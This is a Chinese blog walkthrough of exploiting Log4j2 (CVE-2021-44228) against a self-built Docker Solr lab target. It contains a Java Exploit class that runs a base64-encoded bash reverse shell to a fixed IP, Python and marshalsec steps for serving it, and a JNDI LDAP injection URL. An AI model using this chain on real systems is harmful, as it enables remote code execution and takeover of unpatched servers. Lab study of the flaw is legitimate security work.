Log4j2-CVE-2021-44228

发布时间:2023年12月30日

一、环境搭建

机器:kali Linux

Java:jdk8

python:python3.7.x

二、在docker里面搭建靶机环境

三、访问

四、构造payload

五、替换

将上面构造好的反弹shell语句替换

import java.lang.Runtime;
import java.lang.Process;
public class Exploit {
???? public Exploit(){
???????????? try{
???????????????? Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxNy4xMjgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}");
??????????????????????????????? }catch(Exception e){
??????????????????????????????????????????? e.printStackTrace();
???????????????????????????????????????????? }
??????????????? }
???????? public static void main(String[] argv){
???????????????????????? Exploit e = new Exploit();
??????????????????????????? }
}?

将上面文件放进Exploit.java文件,在Windows用javac进行编译成Exploit.class,记得切换成 jdk8!

然后放进kali里面查看

六、开启恶意站点

用python在含有java.class开启http服务

访问一下,看看效果

七、用marshalsec-0.0.3-SNAPSHOT-all.jar插件开启LADP监听

八、开启监听端口

九、传入恶意参数

http://127.0.0.1:8983/solr/admin/cores?action=${jndi:ldap://192.168.217.128:1389/Exploit}

十、查看效果

如上图所示即反弹shell成功!?

文章来源:https://blog.csdn.net/weixin_46239998/article/details/135229801
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。